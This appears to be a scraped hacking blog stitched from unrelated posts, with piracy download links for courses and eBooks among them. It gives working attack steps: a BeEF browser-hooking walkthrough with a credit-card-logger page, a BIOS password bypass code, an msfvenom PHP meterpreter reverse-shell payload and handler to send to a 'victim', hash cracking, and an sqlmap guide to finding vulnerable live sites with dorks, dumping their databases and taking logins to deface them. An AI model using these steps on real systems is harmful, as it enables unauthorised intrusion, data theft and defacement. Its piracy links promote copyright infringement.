Disclaimer
The contributor(s) cannot be held responsible for any misuse of the data. This repository is just a collection of URLs to download eBooks for free. Download the eBooks at your own risks.
DMCA take down cannot be possible as we are not republishing the books/infringement of code, but we are just hosting the links to 3rd party websites where these books can be downloaded.
Disclaimer
The contributor(s) cannot be held responsible for any misuse of the data. This repository is just a collection of URLs to download eBooks for free. Download the eBooks at your own risks.
DMCA take down cannot be possible as we are not republishing the books/infringement of code, but we are just hosting the links to 3rd party websites where these books can be downloaded.
Disclaimer
The contributor(s) cannot be held responsible for any misuse of the data. This repository is just a collection of URLs to download eBooks for free. Download the eBooks at your own risks.
DMCA take down cannot be possible as we are not republishing the books/infringement of code, but we are just hosting the links to 3rd party websites where these books can be downloaded.
Disclaimer
The contributor(s) cannot be held responsible for any misuse of the data. This repository is just a collection of URLs to download eBooks for free. Download the eBooks at your own risks.
DMCA take down cannot be possible as we are not republishing the books/infringement of code, but we are just hosting the links to 3rd party websites where these books can be downloaded.
Disclaimer
The contributor(s) cannot be held responsible for any misuse of the data. This repository is just a collection of URLs to download eBooks for free. Download the eBooks at your own risks.
DMCA take down cannot be possible as we are not republishing the books/infringement of code, but we are just hosting the links to 3rd party websites where these books can be downloaded.
Disclaimer
The contributor(s) cannot be held responsible for any misuse of this data. All credits go to Tyler Ginnis. Download the video course at your own risks and pre-cautions.
DMCA take down cannot be possible as we are not republishing this video course of code, but we are just hosting the links to 3rd party websites where this video course can be downloaded. Thanks!!
Download here : https://mega.nz/#F!HqBXUIDA!Zc2tmixcT3ZU3yCgdc3ZAw
BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.
Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploit ability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.
credits to https://beefproject.com/
so in other words we can use this to hack a browser with a link.
I am testing this on my own network make sure you have the consent of the owner before testing.
To send the link you must have the right ports open on your router.
moving on, open terminal and type service apache2 start 
now we type ifconfig for our local host.
so my local host is 192.168.8.107 nice one so once we have the local host we need to start beef if you are using Kail it’s already installed. If you’re using another OS that beef isn’t installed on use this command and install it by going into the dir git clone https://github.com/beefproject/beef.git as I’m on Kail I don’t have to install it, and I wont be showing you how to install it sorry that’s for a post some other time so let’s get back to this. Now we clear the terminal just type clear and then we type beef-xss
this will now open Firefox and load the login for beef.
now we are going to change the url to our local host so we can login, so my local host is 192.168.107
Username: beef Password: beef
now that you’re logged in there’s a few thing’s you need to know it will be displayed on the main page so make sure to read it.
now we get the page to send to the victim in this case my self coz I’m a loner lol.
So we need to go down to
and click on one of the links, one is a basic page another is more advanced with credit card logger. I do not advise you to use this!!
Default example of pages;
Basic
Advanced
once you click on the link you will see the left hand side of the screen show a list with your local host this tells you the browser is hooked, click it
it will give you this menu you will have to click command, click on the command you wanna send to the browser
remember from the starting page on beef green means it will be invisible to target, amber means may be visible to target and silver or white wont work, also red means wont work.
I hope you like this any questions feel free to comment below!!
The system clock needs to be reset back to a time when the manufacturer rescue password was valid. Windows 10 will be used in this example.
Right click on the clock displaying the current system time on the taskbar, and select “Adjust Date/Time” on the popup menu.
Next, uncheck “Set time automatically” to enable the “Change date and time” button, click it, and set the system time to (11/23/2011).
Finally save and reboot the system. Be sure to hold the “ESC” key to reach the “Select Boot Device” prompt similar to the one below.
Select “Enter Setup” and type in an incorrect password (can be anything) into the prompt, followed by pressing the “Enter” (or Return) key one time. Now press “ALT+R” as a key combination to achieve the following prompt:
Finally, type (Please mind the capitalization as it is significant):
A1AAABBA
then press “Enter”.
Congradulations! Both User-level (required at BOOT time –before loading OS) and Admin-level (required to enter BIOS setup/configuration) passwords are reset to manufacturer’s specifications, e.g. cleared with values changed to “Not Installed” in the bios. No more password prompts at boot time or when entering UEFI/BIOS configuration menus.
Disclaimer
The contributor(s) cannot be held responsible for any misuse of the data. This repository is just a collection of URLs to download eBooks for free. Download the eBooks at your own risks.
DMCA take down cannot be possible as we are not republishing the books/infringement of code, but we are just hosting the links to 3rd party websites where these books can be downloaded.
Download here: https://mega.nz/#!73xX0CqC!ryXSz29m1fvE1HG6bGRxOjixcVHSg590YJ7ZimgcMcQ
So let make payloads with php using msfvemon
what is msfvemon ?? well metasploit framework venom is a payload gen in Kali Linux parrot cyborg hawk black arch hell u can get it on your mobile with termux
so lets start but starting apache2 so open terminal and type >service apache2 start
now we need are local ip or external ip for local ip ifconfig and for external google whats my ip
note if using external link u need to forward the ports on your router but thats for another post lol
now u got the local ip lets make the payloadmsfvenom -p php/meterpreter/reverse_tcp LHOST= 192.168.8.107 LPORT=4444 -e php/base64 -f raw > /root/Desktop/Home.php
now go to the Desktop and copy the payload to ur html file in /var/www/html folder
now open a new terminal and type msfconsole
use exploit/multi/handler/
set payload php/meterpreter/reverse_tcp
set lhost ur local host or external ip or serveo or ngrok there for another post
set lport 4444
exploit
now send the victum the link 192.168.8.107:4444/Home.php as u see from the pic above the payload connected ^^^
now type help and u get full list commands u can run under metasploit 🙂 next one i do on payloads i will show u how to make payload with out ur ip
So lets crack some hash’s with john the ripper on Kali Linux lets start by get the hash im using sha256 so lets log up is site https://www.xorbin.com/tools/sha256-hash-calculator
now we are going to save the hash to a text file open terminal and type leafpad hashsha256.txt
now lets make a word list with crunch
crunch 4 12 abcdefghijklnmopqrstuvwxyz -o wordlist.txt
let it finish and type
john –fork=2 –wordlist wordlist.txt –format=raw-sha256 hashsha256.txt
Please note, We are not responsible for what you do with this information. This is for educational purposes only.
So, starting off it would be best to view all of the available commands for sqlmap, you can do so by typing in your terminal sqlmap -h. It will list all of the available commands. Feel free to have a read through but for now you wont need most of them.
Now you will need to find a vulnerable website. I will be using one that isn’t used or updated anymore and has just been left there. Some dorks will come in handy here for finding sites, I will leave a file below with a list of them for you to use.
So just open that and select one to use, and paste it into google or bing etc. Once you have clicked on a site, put the ‘ symbol at the end of the URL to see if it is running on anything that is vulnerable to sql injection. If it comes up with nothing, hit back and choose another site, If it comes up with something like this, then it is vulnerable.
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”1”’ at line 1
Once you have found a site that is vulnerable, go back to your terminal and type sqlmap -u putTheWebsiteHere –dbs –tor –time-sec 3 –random-agent, and it will attempt to inject code into the site.
Now just let this run, if it asks you if you want to test everything and not just what the site is running on, type y so that is doesn’t waste time by testing other stuff. If it asks to do all tests for that DBMS, type y again.
Once done it should display something like this:
Also sometimes sqlmap may display false positives, if it does then just search for a different site to test.
Anyway, once done testing the site now you can type sqlmap -u website -D databasename –tables and it will come up with all the tables in that db. You can go through all of these and choose what you want to dump but for the sake of this post I will just dump everything. To dump a specific database you can do sqlmap -u WebsiteHere -D DatabaseName –dump –random-agent (I just dumped everything but I wouldn’t recommend doing this as most of it is useless stuff you can find on the site normally anyway)
Now it’s starting to dump everything from that database onto your system, once it is done it will show you where it has been dumped and you can go and view it all.
You can also find logins to the site in the databases, which is handy if you are looking to deface it. You would need an admin page finder but that’s for another post.
Download here :https://github.com/Rajkumrdusad/Tool-X.git
pkg install python
apt install git
git clone https://github.com/Rajkumrdusad/Tool-X.git
cd Tool-X
chmod +x install.aex
./install.aex
Tool-X
DISCLAIMER
DISCLAIMER
This courses credits and rights go to www.lynda.com for this course. I do not endorse any actions you may perform with the knowledge provided in this course, you may download with your own risks and pre-cautions. So therefore a DMCA take down is not possible as we are just hosting this video course with a 3rd party link. Thanks!!
Download here: https://mega.nz/#F!byxAlCDY!BAZmN8YSKrds7UX1WrW-7w
Disclaimer
The contributor(s) cannot be held responsible for any misuse of the data. This repository is just a collection of URLs to download eBooks for free. Download the eBooks at your own risks.
DMCA take down cannot be possible as we are not republishing the books/infringement of code, but we are just hosting the links to 3rd party websites where these books can be downloaded.
Download here: https://mega.nz/#!jyw00YKK!K0jQ7K52NxKU_WBCrY4C6JXZtVoRI6CdyR5hanymaS4
